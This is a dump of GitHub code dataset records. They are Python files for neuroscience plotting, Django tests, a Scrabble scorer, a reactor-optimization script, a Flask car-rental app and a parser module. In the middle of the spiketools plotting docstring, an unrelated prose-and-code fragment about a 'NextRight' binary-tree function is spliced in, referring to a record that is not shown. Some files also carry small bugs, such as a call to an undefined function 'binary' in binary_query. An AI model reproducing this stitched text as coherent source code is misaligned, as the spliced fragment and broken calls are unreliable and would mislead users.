spiketools.plts.style import set_plt_kwargs, invert_axes\n\n###################################################################################################\n###################################################################################################\n\n@savefig\n@set_plt_kwargs\ndef plot_positions(position, spike_positions=None, landmarks=None, x_bins=None,\n y_bins=None, invert=None, ax=None, **plt_kwargs):\n \"\"\"Plot positions.\n\n Parameters\n ----------\n position : 2d array or list of 2d array\n Position data.\n If a list, each array from the list is plotted separately, on the same plot.\n spike_positions : 2d array or dict, optional\n Position values of spikes, to indicate on the plot.\n If array, defines the positions.\n If dictionary, should include a 'positions' key plus additional plot arguments.\n landmarks : 1d or 2d array or dict 
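The `NextRight` record above answers its query by processing the queue one full tree level at a time: within a level, the first node dequeued after the key is the key's right neighbor, and if the key closes its level the answer is -1. A self-contained version with a quick check:

```python
from collections import deque

class Node:
    def __init__(self, data, left=None, right=None):
        self.data, self.left, self.right = data, left, right

def next_right(root, key):
    queue = deque([root])
    while queue:
        found = False
        for _ in range(len(queue)):        # exactly one tree level per pass
            node = queue.popleft()
            if found:
                return node.data           # first node to the right of the key
            if node.data == key:
                found = True
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        if found:
            return -1                      # the key was rightmost in its level
    return -1

root = Node(4, Node(1, None, Node(2)), Node(5, None, Node(6)))
assert next_right(root, 1) == 5
```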
or list, optional\n Position values of landmarks, to be added to the plot.\n If array, defines the positions, as [x, y] for a single landmark 1d array,\n or as [[x-pos], [y-pos]] for a 2d definition of multiple landmarks.\n If dictionary, should include a 'positions' key with an array plus additional arguments.\n Multiple landmarks can be added by passing a list of arrays or a list of dictionaries.\n x_bins, y_bins : list of float, optional\n Bin edges for each axis.\n If provided, these are used to draw grid lines on the plot.\n invert : {'x', 'y', 'both'}, optional\n If provided, inverts the plot axes over x, y or both axes.\n Note that invert x is equivalent to flipping the data left/right, and y to flipping up/down.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n orientation = check_array_lst_orientation(listify(position))\n for cur_position in listify(position):\n ax.plot(*make_row_orientation(cur_position, orientation),\n color=plt_kwargs.pop('color', DEFAULT_COLORS[0]),\n alpha=plt_kwargs.pop('alpha', 0.35),\n **plt_kwargs)\n\n if spike_positions is not None:\n defaults = {'color' : 'red', 'alpha' : 0.4, 'ms' : 6}\n if isinstance(spike_positions, np.ndarray):\n add_dots(make_row_orientation(spike_positions, orientation),\n ax=ax, **defaults)\n elif isinstance(spike_positions, dict):\n add_dots(make_row_orientation(spike_positions.pop('positions'), orientation),\n ax=ax, **{**defaults, **spike_positions})\n\n if landmarks is not None:\n defaults = {'alpha' : 0.85, 'ms' : 12}\n for landmark in [landmarks] if not isinstance(landmarks, list) else landmarks:\n if isinstance(landmark, np.ndarray):\n add_dots(make_row_orientation(landmark, orientation),\n ax=ax, **defaults)\n elif isinstance(landmark, dict):\n add_dots(make_row_orientation(landmark.pop('positions'), orientation),\n ax=ax, **landmark)\n\n add_gridlines(x_bins, y_bins, ax)\n invert_axes(invert, ax)\n\n\n@savefig\n@set_plt_kwargs\ndef plot_position_1d(position, events=None, colors=None, sizes=None, ax=None, **plt_kwargs):\n \"\"\"Position 1d position data, with annotated events.\n\n Parameters\n ----------\n position : 1d array\n Position data.\n events : 1d array or dict or list\n Events to add to the plot, as vertical lines.\n If array, defines the position(s) of each event.\n If dictionary, should include a 'positions' key with an array plus additional arguments.\n Multiple event definitions can be passed in as a list of dictionaries or arrays.\n colors : str or list of str\n Color(s) for each event.\n Only used if `events` are passed in as an array or list of arrays.\n sizes : float or list of float\n Size(s) for each event.\n Only used if `events` are passed in as an array or list of arrays.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n Custom kwargs: 'position_color', 'position_alpha', 'position_linewidth'.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n if position is not None:\n\n position_plt_kwargs = drop_key_prefix(subset_dict(plt_kwargs, 'position'), 'position')\n ax.plot(position, [1] * len(position), **position_plt_kwargs)\n\n colors = iter(listify(colors)) if colors else iter(DEFAULT_COLORS[1:])\n sizes = iter(listify(sizes)) if sizes else repeat(1)\n\n events = [events] if isinstance(events, (dict, np.ndarray)) else events\n for event in events:\n\n if 
isinstance(event, np.ndarray):\n ax.eventplot(event, color=next(colors), linelengths=next(sizes), **plt_kwargs)\n elif isinstance(event, dict):\n ax.eventplot(**relabel_keys(event, {'size' : 'linelengths'}), **plt_kwargs)\n\n ax.set(xlabel='Position', yticks=[])\n\n\n@savefig\n@set_plt_kwargs\ndef plot_position_by_time(timestamps, position, spikes=None, spike_positions=None,\n event_times=None, event_positions=None, event_kwargs=None,\n time_bins=None, position_bins=None, invert=None,\n ax=None, **plt_kwargs):\n \"\"\"Plot the position across time for a single dimension.\n\n Parameters\n ----------\n timestamps : 1d array\n Timestamps, in seconds, corresponding to the position values.\n position : 1d array\n Position values, for a single dimension.\n spikes : 1d array, optional\n Spike times, in seconds.\n spike_positions : 1d array, optional\n Position values of spikes, to indicate on the plot.\n event_times : 1d array, optional\n Time values of event markers to add to the plot.\n If provided, `event_positions` must also be provided.\n event_positions : 1d array, optional\n Position values of event markers to add to the plot\n If provided, `event_times` must also be provided.\n event_kwargs : dict, optional\n Keyword arguments for styling the events to be added to the plot.\n time_bins : list of float, optional\n Bin edges for the time axis.\n If provided, these are used to draw vertical grid lines on the plot.\n position_bins : list of float, optional\n Bin edges for the position axis.\n If provided, these are used to draw horizontal grid lines on the plot.\n invert : {'x', 'y', 'both'}, optional\n If provided, inverts the plot axes over x, y or both axes.\n Note that invert x is equivalent to flipping the data left/right, and y to flipping up/down.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n spike_positions_plot = None\n if spikes is not None:\n spike_positions_plot = np.array([spikes, spike_positions])\n\n event_defaults = {'alpha' : 0.85, 'ms' : 10}\n landmarks = {'positions' : np.array([event_times, event_positions]),\n **combine_dicts([event_defaults, {} if not event_kwargs else event_kwargs])}\n\n plot_positions(np.array([timestamps, position]), spike_positions_plot,\n landmarks=landmarks, x_bins=time_bins, y_bins=position_bins,\n invert=invert, ax=ax, **plt_kwargs)\n\n ax.set(xlabel='Time', ylabel='Position')\n\n\n@savefig\n@set_plt_kwargs\ndef plot_heatmap(data, smooth=False, smoothing_kernel=1.5, ignore_zero=False,\n cbar=False, cmap=None, vmin=None, vmax=None,\n transpose=False, invert=None, ax=None, **plt_kwargs):\n \"\"\"Plot a spatial heat map.\n\n Parameters\n ----------\n data : 2d array\n Measure to plot across a grided environment.\n smooth : bool, optional, default: False\n Whether to smooth the data before plotting.\n smoothing_kernel : float, optional, default: 1.5\n Standard deviation of the gaussian kernel to apply for smoothing.\n ignore_zero : bool, optional, default: False\n If True, replaces 0's with NaN for plotting.\n cbar : bool, optional, default: False\n Whether to add a colorbar to the plot.\n cmap : str, optional\n Which colormap to use to plot.\n vmin, vmax : float, optional\n Min and max plot ranges.\n transpose : bool, optional, default: False\n Whether to transpose the data before plotting.\n invert : {'x', 'y', 'both'}, optional\n If provided, inverts the plot axes over x, y or both axes.\n Note 
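`plot_heatmap` above optionally smooths the matrix and masks zeros as NaN before handing it to `imshow`, so empty bins render as gaps rather than as the lowest color. That preprocessing in isolation, assuming a gaussian kernel from `scipy.ndimage` (an assumption here; the file itself routes smoothing through its own `smooth_data` helper):

```python
import numpy as np
from scipy.ndimage import gaussian_filter

def prep_heatmap(data, kernel=1.5, ignore_zero=False):
    data = np.atleast_2d(np.asarray(data, dtype=float))
    data = gaussian_filter(data, sigma=kernel)
    if ignore_zero:
        data = data.copy()
        data[data == 0.0] = np.nan   # NaN cells are left unpainted by imshow
    return data
```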
that invert x is equivalent to flipping the data left/right, and y to flipping up/down.\n ax : Axes, optional\n Axis object upon which to plot.\n plt_kwargs\n Additional arguments to pass into the plot function.\n\n Notes\n -----\n This function uses `plt.imshow` to visualize the matrix.\n Note that in doing so, it defaults to settings the origin to 'lower'.\n This setting can be overwritten by passing in a value for `origin`.\n \"\"\"\n\n ax = check_ax(ax, figsize=plt_kwargs.pop('figsize', None))\n\n if data.ndim < 2:\n data = np.atleast_2d(data)\n\n if transpose:\n data = data.T\n\n if smooth:\n data = smooth_data(data, smoothing_kernel)\n\n if ignore_zero:\n data = deepcopy(data)\n data[data == 0.] = np.nan\n\n im = ax.imshow(data, cmap=cmap, vmin=vmin, vmax=vmax,\n origin=plt_kwargs.pop('origin', 'lower'),\n **plt_kwargs)\n\n ax.set(xticks=[], yticks=[])\n ax.set_axis_off()\n\n if cbar:\n colorbar = plt.colorbar(im)\n colorbar.outline.set_visible(False)\n\n invert_axes(invert, ax)\n\n\n@savefig\ndef plot_trial_heatmaps(trial_data, **plt_kwargs):\n \"\"\"Plot spatial heat maps for a set of trials.\n\n Parameters\n ----------\n trial_data : 3d array\n Spatially binned spike activity, per trial, with shape of [n_trials, n_xbins, n_ybins].\n plt_kwargs\n Additional arguments to pass into the plot function.\n This can include arguments into `make_axes`, which initializes the set of axes.\n \"\"\"\n\n axis_kwargs = {key : plt_kwargs.pop(key) \\\n for key in get_function_parameters(make_axes).keys() if key in plt_kwargs}\n axes = make_axes(trial_data.shape[0], **axis_kwargs)\n for data, ax in zip(trial_data, axes):\n plot_heatmap(data, **plt_kwargs, ax=ax)\n\n\ndef create_heat_title(label, data, stat=None, p_val=None):\n \"\"\"Create a standardized title for an heatmap, listing the data range.\n\n Parameters\n ----------\n label : str\n Label to add to the beginning of the title.\n data : 2d array\n The array of data that is plotted, used to compute the data range.\n stat, p_val : float, optional\n A statistical test value and p statistic to report related to the heatmap.\n\n Returns\n -------\n title : str\n Title for the plot.\n \"\"\"\n\n template = '({:1.2f}-{:1.2f})' if 'float' in str(data.dtype) else '({:d}-{:d})'\n if stat is None:\n title = ('{} - ' + template).format(label, *compute_range(data))\n else:\n title = ('{} - ' + template + '\\n stat: {:1.2f}, p: {:1.2f}').format(\\\n label, *compute_range(data), stat, p_val)\n\n return title\n","repo_name":"spiketools/spiketools","sub_path":"spiketools/plts/spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":12207,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"34"} +{"seq_id":"32043681474","text":"__author__ = 'dooferlad'\n\nimport datetime\nimport hashlib\nimport unittest\n\nfrom django.test import TestCase\n\nfrom license_protected_downloads.models import (\n APIKeyStore,\n APIToken,\n License,\n)\n\n\nclass LicenseTestCase(TestCase):\n def setUp(self):\n lic1_text = 'Samsung License'\n lic2_text = 'Stericsson License'\n lic3_text = 'Linaro License'\n digest1 = hashlib.md5(lic1_text).hexdigest()\n digest2 = hashlib.md5(lic2_text).hexdigest()\n digest3 = hashlib.md5(lic2_text).hexdigest()\n self.lic1 = License.objects.create(\n digest=digest1, text=lic1_text, theme='samsung')\n self.lic2 = License.objects.create(\n digest=digest2, text=lic2_text, theme='stericsson')\n self.lic3 = License.objects.create(\n digest=digest3, text=lic3_text, theme='linaro')\n\n def 
test_add_license_to_database(self):\n self.assertEquals(self.lic1.theme, 'samsung')\n self.assertEquals(self.lic2.theme, 'stericsson')\n self.assertEquals(self.lic3.theme, 'linaro')\n\n lic1 = License.objects.get(pk=1)\n self.assertEquals(lic1.theme, 'samsung')\n self.assertEquals(lic1.text, 'Samsung License')\n lic2 = License.objects.get(pk=2)\n self.assertEquals(lic2.theme, 'stericsson')\n self.assertEquals(lic2.text, 'Stericsson License')\n lic3 = License.objects.get(pk=3)\n self.assertEquals(lic3.theme, 'linaro')\n self.assertEquals(lic3.text, 'Linaro License')\n\n\nclass APITokenTests(TestCase):\n def setUp(self):\n self.key = APIKeyStore.objects.create(key='foo')\n self.request = None\n\n def test_no_expire(self):\n token = APIToken.objects.create(key=self.key)\n self.assertTrue(token.valid_request(self.request))\n\n expires = datetime.datetime.now() + datetime.timedelta(minutes=1)\n token = APIToken.objects.create(key=self.key, expires=expires)\n self.assertTrue(token.valid_request(self.request))\n\n def test_expired(self):\n expires = datetime.datetime.now() - datetime.timedelta(seconds=1)\n token = APIToken.objects.create(key=self.key, expires=expires)\n self.assertFalse(token.valid_request(self.request))\n self.assertTrue(len(token.token) > 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NexellCorp/infrastructure_server_linaro-license-protection","sub_path":"license_protected_downloads/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28352189095","text":"letters = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\",\n \"W\", \"X\", \"Y\", \"Z\"]\npoints = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 4, 1, 3, 10, 1, 1, 1, 1, 4, 4, 8, 4, 10]\n\nletters_to_points = {key: value for key, value in zip(letters, points)}\nletters_to_points[\" \"] = 0\n\n\ndef score_word(word):\n print_total = 0\n for letter in word:\n print_total += letters_to_points.get(letter, 0)\n return print_total\n\n\nplayer_to_words = {\"player1\": [\"BLUE\", \"TENNIS\", \"EXIT\"], \"wordNerd\": [\"EARTH\", \"EYES\", \"MACHINE\"],\n \"Lexi Con\": [\"ERASER\", \"BELLY\", \"HUSKY\"], \"Prof Reader\": [\"ZAP\", \"COMA\", \"PERIOD\"]}\n\nplayer_to_points = {}\n\n\ndef update_point_total(player, words):\n for player, words in player_to_words.items():\n player_points = 0\n for word in words:\n player_points += score_word(word)\n player_to_points[player] = player_points\n print(player_to_points)\n\n\ndef play_word(player, words):\n player_to_words[player].append(words)\n\n\nletters += [letter.lower() for letter in letters]\npoints *= 2","repo_name":"TMahen21/Codes","sub_path":"Scrabble Project.py","file_name":"Scrabble Project.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41325227883","text":"#!/usr/bin/env python\nimport scipy.interpolate\nimport h5py\nimport pandas as pd\nimport os\nimport pickle\n#import dill as pickle\n\n#import dakota.interfacing as di\n#params, results = di.read_parameters_file(parameters_file='sfr_moo.in', results_file='sfr_moo.out')\n\n###Hard Coded In Values - need to fix\n\n#params = {'height': (50, 70), 'smear': (50, 70)}\n#results = ['keff', 'void_coeff', 'doppler_coeff']\n\ndb = h5py.File('test_db.h5', 
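In the license fixtures above, `digest3` is computed from `lic2_text` rather than `lic3_text`, almost certainly a copy-paste slip, since a content digest should be derived from its own text; the record also feeds `hashlib.md5` a `str`, which only works on Python 2. A Python 3 safe helper for the intended fingerprinting:

```python
import hashlib

def license_digest(text):
    # md5 serves as a content fingerprint here, not as a security measure.
    return hashlib.md5(text.encode("utf-8")).hexdigest()

assert license_digest("Linaro License") != license_digest("Stericsson License")
```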
'r+')\nreactorDict = {}\nfor r in db.keys():\n reactor = db[r]\n labels = [attr for attr in reactor.attrs]\n attrs = [reactor.attrs[attr] for attr in reactor.attrs]\n dataDict = dict(zip(labels, attrs))\n reactorDict[r] = dataDict\n\nreactorData = pd.DataFrame(reactorDict)\nreactorData = reactorData.T\n# Convert stored bytes back to strings\nreactorData['enrichment'] = reactorData['enrichment'].apply(lambda x : x.decode(\"utf-8\"))\nreactorData['condition'] = reactorData['condition'].apply(lambda x : x.decode(\"utf-8\"))\n\nreactorData.to_pickle(\"./sfr_Data.pkl\")\n\n# Create a a coordinate system via the variables for interpolator\n#var_array = []\n#for k, v in params.items():\n# var_list = []\n# for data_point in reactorData[k]:\n# var_list.append(data_point)\n# var_array.append(var_list)\n#coordinates = list(zip(*var_array))\n# \n## Create a list of objectives to solve for, and a list of known values\n## for the objectives \n#obj_dict = {}\n#interp = {}\n#for obj in results:\n# obj_list = []\n# for data_point in reactorData[obj]:\n# try:\n# obj_list.append(data_point[0])\n# except IndexError:\n# obj_list.append(data_point)\n# obj_dict[obj] = obj_list\n# \n## Create a dictionary of the objective function and the interpolator,\n## given the coordinates and objective values\n#for obj_name, obj in obj_dict.items():\n# interp[obj_name] = scipy.interpolate.LinearNDInterpolator(coordinates, obj)\n# \n#fileObject = open('interpolator.pkl', 'wb')\n#\n#pickle.dump(interp, fileObject)\n#fileObject.close()\n\nos.system(\"dakota -i sfr_moo.in -o sfr.out > sft.stdout\")","repo_name":"ryanstwrt/SFR_Dakota_Interface","sub_path":"run_sfr_opt.py","file_name":"run_sfr_opt.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30807693807","text":"#!/usr/bin/env python\n\ndef binary_query(msg, default=True):\n '''\n Query the user with the yes/no question ``msg``. Return True if the response is yes, and\n return False if the response is no.\n '''\n if default == True:\n suffix = 'Y/n\\n'\n else:\n suffix = 'y/N\\n'\n response = input(msg + ' ' + suffix)\n if response.lower() == 'y' or response.lower() == 'yes':\n return True\n elif response.lower() == 'n' or response.lower() == 'no':\n return False\n # If the user response is not y/yes/n/no, call this function again, printing an error\n # message.\n else:\n binary(\"Invalid response. 
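The reactor-optimization driver above walks every group in an HDF5 file, flattens each group's attributes into a dict, and builds a transposed DataFrame (one row per reactor, one column per attribute). The extraction as a standalone helper (the file name is illustrative):

```python
import h5py
import pandas as pd

def attrs_to_frame(path):
    with h5py.File(path, "r") as db:
        rows = {name: dict(group.attrs) for name, group in db.items()}
    return pd.DataFrame(rows).T   # rows: groups; columns: attribute names
```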
Please type yes or no.\", default=default)\n\ndef string_query(msg):\n '''\n Query the user with the question ''msg'', and return the string that the \n user enters in response.\n '''\n print(msg)\n s = input('>>> ')\n return s\n","repo_name":"meghanjwyatt/statsproject","sub_path":"loaddata/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12999078740","text":"import heapq\nfrom operator import mul\n\n\ndef get_calculate(number_list):\n smallest = heapq.nsmallest(2, number_list)\n biggest = heapq.nlargest(2, number_list)\n if mul(*smallest) > mul(*biggest):\n return sorted(smallest)\n else:\n return sorted(biggest)\n\n\nwith open('input.txt') as file:\n number_list = list(map(int, file.read().split()))\n\nwith open('output.txt', 'w') as file:\n file.write(' '.join(map(str, get_calculate(number_list))))\n","repo_name":"dimk00z/summer_yandex_algorithmic_course","sub_path":"Homework_2/G_Greatest_product_of_two_numbers/G_Greatest_product_of_two_numbers.py","file_name":"G_Greatest_product_of_two_numbers.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"32109107652","text":"from sys import stdin\n\nn, m = [int(x) for x in stdin.readline().split()]\nadj = [[] for _ in range(n+1)]\ndp = [0] * (n+1)\nvis = [0] * (n+1)\nfor i in range(n-1):\n x, y = [int(x) for x in stdin.readline().split()]\n adj[x].append(y)\n\ndef dfs(s, cnt):\n if vis[s] or s > n:\n return cnt\n vis[s] = 1\n dp[s] = cnt\n for i in adj[s]:\n dfs(i, cnt+1)\n\ndfs(1,0)\nans = [0] * (n+1)\nfor i in range(1, n+1):\n ans[dp[i]] += 1\ncnt = 0\n\nfor i in range(1, n+1):\n sav = dp[i] + m\n if sav <= n+1:\n cnt += ans[sav]\nprint(dp, cnt)","repo_name":"trungpro5398/Competitive-programming","sub_path":"CP problems/Big-O/Backtracking/Distance in Tree.py","file_name":"Distance in Tree.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22377338636","text":"from abc import ABC\nfrom typing import TYPE_CHECKING, Any, List, NewType\n\nif TYPE_CHECKING:\n from vkbottle.dispatch.views.abc import ABCView\n from vkbottle.dispatch.handlers.abc import ABCHandler\n\n\nMiddlewareResponse = NewType(\"MiddlewareResponse\", bool)\n\n\nclass BaseMiddleware(ABC):\n async def pre(self, event):\n ...\n\n async def post(\n self, event, view: \"ABCView\", handle_responses: List[Any], handlers: List[\"ABCHandler\"]\n ):\n ...\n\n def __repr__(self) -> str:\n return f\"<{self.__class__.__name__}>\"\n","repo_name":"matematica298/FirstBotForVK","sub_path":"venv/Lib/site-packages/vkbottle/dispatch/middlewares/abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3954405578","text":"import datetime\nimport random\n\nfrom flask import render_template, url_for, flash, redirect, request\nfrom rentalApp import app, bcrypt\nfrom rentalApp.forms import RegistrationForm, LoginForm, AddRentalForm, RentalForm, AddHours\nfrom rentalApp import con, login_manager\nfrom rentalApp.user import User, validate_user\nfrom flask_login import login_user, logout_user, current_user\nfrom datetime import date\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return 
User.get(user_id)\n\n\n@app.route(\"/\")\n@app.route(\"/home\") # Our main page for the app\ndef home():\n return render_template('home.html')\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/rentals\")\ndef rentals():\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"SELECT * FROM rental WHERE Status = 'available'\")\n data = cursor.fetchall()\n cursor.close()\n return render_template('rentals.html', title='Rentals', response=data)\n\n\n@app.route(\"/rentals/\", methods=[\"GET\", \"POST\"])\ndef rentCar(rentalid):\n form = RentalForm()\n if not current_user.is_authenticated:\n flash('You must make an account to rent!', \"danger\")\n return redirect(url_for('home'))\n\n if form.validate_on_submit():\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"UPDATE rental SET Status = 'rented' WHERE RegNo = %s\", (str(rentalid),))\n con.commit()\n\n cursor.execute(\"SELECT * FROM rental WHERE RegNo = %s\", (str(rentalid),))\n result = cursor.fetchone()\n\n price = result[\"Price\"]\n coverage = form.insurance_type.data\n insurance_price = 0\n if coverage == \"partial\":\n insurance_price = price * 0.05 * int(form.days.data)\n else:\n insurance_price = price * 0.10 * int(form.days.data)\n\n cursor.execute(\"INSERT INTO insurance_plan (Price, Coverage) VALUES (%s,%s)\", (insurance_price, coverage))\n con.commit()\n\n cursor.execute(\"SELECT last_insert_id()\")\n plan_no = cursor.fetchone()[\"last_insert_id()\"]\n\n cursor.execute(\"SELECT * FROM agent\")\n agent_list = cursor.fetchall()\n agents = []\n for a in agent_list:\n agents.append(a[\"Agent_SSN\"])\n\n agent = random.choice(agents)\n\n cursor.execute(\"SELECT ID FROM customer WHERE Username = %s\", (current_user.get_id(),))\n cust = cursor.fetchone()[\"ID\"]\n\n cursor.execute(\"INSERT INTO insurance_transaction VALUES (%s,%s,%s);\", (int(cust), int(plan_no), int(agent)))\n con.commit()\n\n today = date.today()\n start_date = today.strftime(\"%Y-%m-%d\")\n end_date = today + datetime.timedelta(days=int(form.days.data))\n\n cursor.execute(\"INSERT INTO rents VALUES(%s,%s,%s,%s,%s)\",\n (int(cust), int(rentalid), float(price) * int(form.days.data), start_date, end_date))\n con.commit()\n\n cursor.close()\n flash('Successfully rented the car!', \"success\")\n return redirect(url_for('home'))\n\n cursor = con.cursor(dictionary=True)\n num = cursor.execute(\n \"SELECT Make, Model, Color, City, Address, Price FROM rental WHERE Status = 'available' and RegNo = %s\",\n (str(rentalid),))\n data = cursor.fetchone()\n cursor.close()\n if data is None:\n flash('No existing rental', 'danger')\n return redirect(url_for('rentals'))\n\n return render_template('individualrental.html', title='Rentals', response=data, regNo=rentalid, form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = RegistrationForm()\n if form.validate_on_submit():\n hash_pw = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n\n cursor = con.cursor()\n account_query = \"INSERT INTO account VALUES (%s, %s)\"\n account_info = (str(form.username.data), hash_pw)\n cursor.execute(account_query, account_info)\n con.commit()\n\n cursor.execute(\"INSERT INTO customer (Username, Name) VALUES (%s, %s)\", (form.username.data, form.name.data))\n con.commit()\n cursor.close()\n\n flash('Account created successfully! 
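The rental view above prices insurance at 5% (partial) or 10% (full) of the car's daily rate per rented day. As a pure function that is easy to unit test (the names are illustrative):

```python
def insurance_price(daily_rate, days, coverage):
    rate = 0.05 if coverage == "partial" else 0.10   # mirrors the view's branch
    return daily_rate * rate * days

assert insurance_price(40.0, 3, "partial") == 6.0
```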
You can now login any time!', 'success')\n return redirect(url_for('login'))\n\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.get(str(form.username.data))\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n flash('Logged in successfully!', 'success')\n return redirect(url_for('home'))\n else:\n flash(\"Username or password doesn't match\", 'danger')\n\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route('/manage', methods=['GET', 'POST'])\ndef manage():\n form = AddHours()\n username = current_user.get_id()\n if current_user.is_authenticated:\n user = current_user.get(username)\n usertype = validate_user(username, user.password)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n\n if usertype != \"user\" and usertype != 401:\n if form.validate_on_submit():\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"SELECT Hours FROM employee WHERE Username = %s\", (username,))\n hours = cursor.fetchone()['Hours']\n new_hours = hours + int(form.hours.data)\n\n cursor.execute(\"UPDATE employee SET Hours = %s WHERE Username = %s\", (new_hours, username))\n con.commit()\n cursor.close()\n flash(\"Hours successfully added!\", 'success')\n\n return render_template('manage.html', form=form)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n\n\n@app.route('/account')\ndef account():\n if not current_user.is_authenticated: # make sure user is logged in\n flash(\"You must log in first.\", 'danger')\n return redirect(url_for('login'))\n\n username = current_user.get_id()\n user = current_user.get(username)\n usertype = validate_user(username, user.password)\n\n cursor = con.cursor(dictionary=True)\n query = \"SELECT r.Model, r.Make, t.Price, t.Start_date, t.End_date\" \\\n \" FROM rents as t, rental as r, customer as c WHERE c.Username = %s\" \\\n \" and c.ID = t.Customer_id and r.RegNo = t.RegNo\"\n cursor.execute(query, (username,))\n rentals = cursor.fetchall()\n cursor.close()\n\n if usertype != \"user\" and usertype != 401: # display for employees\n cursor = con.cursor(dictionary=True)\n cursor.execute(\"SELECT Hours FROM employee WHERE Username = %s\", (username,))\n result = cursor.fetchone()\n cursor.close()\n hours = result[\"Hours\"]\n return render_template('account.html', hours=hours, rentals=rentals)\n\n return render_template('account.html', rentals=rentals)\n\n\n@app.route('/addrental', methods=['GET', 'POST'])\ndef addrental():\n username = current_user.get_id()\n if current_user.is_authenticated:\n user = current_user.get(username)\n usertype = validate_user(username, user.password)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n\n if usertype != \"user\":\n form = AddRentalForm()\n if form.validate_on_submit():\n print(\"rental submitted\")\n cursor = con.cursor(dictionary=True)\n query = \"INSERT INTO rental(Color, Status, Make, Model, City, Address, Price)\" \\\n \"values(%s,%s,%s,%s,%s,%s,%s)\"\n location = form.location.data.split(', ')\n rental_info = (form.color.data, \"available\", 
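Registration above stores `bcrypt.generate_password_hash(...).decode('utf-8')` and login verifies with `bcrypt.check_password_hash`, the flask-bcrypt API. The round-trip in isolation, outside any route:

```python
from flask import Flask
from flask_bcrypt import Bcrypt

app = Flask(__name__)
bcrypt = Bcrypt(app)

def hash_password(plain):
    return bcrypt.generate_password_hash(plain).decode("utf-8")

def verify_password(stored_hash, candidate):
    return bcrypt.check_password_hash(stored_hash, candidate)

assert verify_password(hash_password("s3cret"), "s3cret")
```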
form.make.data,\n form.model.data, location[1], location[0], float(form.price.data))\n cursor.execute(query, rental_info)\n con.commit()\n cursor.close()\n\n flash('Rental added successfully!', 'success')\n return redirect(url_for('manage'))\n\n return render_template('addrental.html', form=form)\n else:\n flash(\"You do not have permissions for that.\", 'danger')\n return redirect(url_for('home'))\n","repo_name":"Evyn710/car-rental-webapp","sub_path":"CPSC471Project/WebApp/rentalApp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26434859317","text":"import abc\nimport typing\n\nfrom .exception import *\nfrom .token import *\nfrom .lexer import *\nfrom .node import *\n\n\n__all__ = [\n \"Parser\",\n \"ParamParser\",\n \"ParamOptionsParser\",\n \"ParamSequenceParser\",\n \"parse\",\n]\n\n\nclass Parser(abc.ABC):\n \"\"\"\n Base class for all parser implementations, such as a :class:`ParamSequenceParser`. A parser takes the stream of\n tokens produced by the lexer and returns a meaningful representation of the data.\n \"\"\"\n\n def __init__(self, lexer: Lexer, offset: int):\n \"\"\"\n Init method for the class.\n\n :param lexer: The lexer that produces the tokens for the parser.\n :param offset: The offset to calculate absolute token position.\n \"\"\"\n self._lexer = lexer\n self._offset = offset\n\n @abc.abstractmethod\n def parse(self) -> list:\n \"\"\"\n Parses the stream of tokens generated by the lexer and returns a meaningful representation of the data as a\n list. Depending on the type of parser, this list might contain strings or might contain nodes.\n\n :raise ParserSyntaxException: The exception raised if the syntax of the expression is invalid.\n :return: The parsed strings or nodes.\n \"\"\"\n pass\n\n def 